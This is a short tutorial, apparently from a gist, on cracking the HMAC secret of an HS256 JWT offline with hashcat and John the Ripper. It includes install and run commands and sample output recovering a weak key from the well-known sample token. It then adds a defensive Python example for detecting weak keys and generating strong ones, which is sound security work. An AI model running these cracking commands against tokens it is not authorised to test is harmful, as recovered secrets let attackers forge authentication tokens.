Crack JWT (HMAC) with HashCat/JohnTheRipper on MacOS
Target:
{
"alg": "HS256",
"typ": "JWT"
}
{
"sub": "1234567890",
"name": "John Doe",
"iat": 1516239022
}
$ echo -n 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.hWgU00w-Sq8jKHr7MD5DSUCMznj5GtHVARKNFgljc9A' > /tmp/jwt.hash
1. HashCat (v.4.1.0)
$ brew install hashcat
$ hashcat -h |grep JWT
16500 | JWT (JSON Web Token) | Network Protocols
$ hashcat -m 16500 /tmp/jwt.hash /path/to/wordlist.txt
...
eyJhbGciOiJ....GtHVARKNFgljc9A:p@ssw0rd
Session..........: hashcat
Status...........: Cracked
Hash.Type........: JWT (JSON Web Token)
...
2. john
; The default john on Kali and from macOS's brew does not support JWT cracking.
$ brew install gcc openssl
$ brew upgrade gcc
$ brew upgrade openssl
$ git clone https://github.com/Sjord/jwtcrack
$ cd jwtcrack/jwtcrack
$ python jwt2john.py eyJhbGciOiJI...c9A > /tmp/jwt.john
$ git clone https://github.com/magnumripper/JohnTheRipper
$ cd JohnTheRipper/src
$ ./configure CPPFLAGS="-I/usr/local/opt/openssl/include" LDFLAGS="-L/usr/local/opt/openssl/lib" --disable-pkg-config
$ make clean && make
$ make install
$ ../run/john --wordlist=/path/to/wordlist.txt /tmp/jwt.john
3. Don't use jwtcrack.py, it sucks.
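
Why the offline attack above works, and the check that prevents it, as an added Python example (not part of the original gist): an HS256 token carries everything needed to test a key guess, so the signing key must be random and at least 32 bytes (RFC 7518, section 3.2). The function names and the short weak-key list are constructed for illustration; the signing input is the header and payload of the target token above.

```python
import base64
import hashlib
import hmac
import secrets

# Header and payload segments of the target token shown above.
SIGNING_INPUT = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
                 "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ")
# Constructed sample denylist; a real audit would load a full wordlist.
WEAK_KEYS = [b"secret", b"changeme", b"p@ssw0rd"]
MIN_KEY_BYTES = 32  # RFC 7518 section 3.2: HS256 keys must be at least 256 bits


def issue_token(key: bytes, signing_input: str = SIGNING_INPUT) -> str:
    """Append the base64url (unpadded) HMAC-SHA256 signature to header.payload."""
    mac = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + base64.urlsafe_b64encode(mac).rstrip(b"=").decode("ascii")


def key_verifies(token: str, key: bytes) -> bool:
    """True if `key` reproduces the token's signature; needs nothing but the token."""
    signing_input, _, _sig = token.rpartition(".")
    return hmac.compare_digest(issue_token(key, signing_input), token)


def find_weak_key(token: str, candidates=WEAK_KEYS):
    """Audit one of your own tokens: return the denylisted key that signed it, or None."""
    return next((k for k in candidates if key_verifies(token, k)), None)


def key_problems(key: bytes) -> list:
    """Provisioning-time check to run before a key is ever used to sign."""
    problems = []
    if len(key) < MIN_KEY_BYTES:
        problems.append("shorter than %d bytes" % MIN_KEY_BYTES)
    if key in WEAK_KEYS:
        problems.append("present in weak-key list")
    return problems


def new_signing_key() -> bytes:
    """Random 256-bit key from the OS CSPRNG, not derivable from any wordlist."""
    return secrets.token_bytes(MIN_KEY_BYTES)


if __name__ == "__main__":
    print(key_problems(b"p@ssw0rd"), find_weak_key(issue_token(b"p@ssw0rd")))
    strong = new_signing_key()
    print(key_problems(strong), find_weak_key(issue_token(strong)))
```

Running `key_problems` at provisioning time rejects a weak key before any token signed with it is issued.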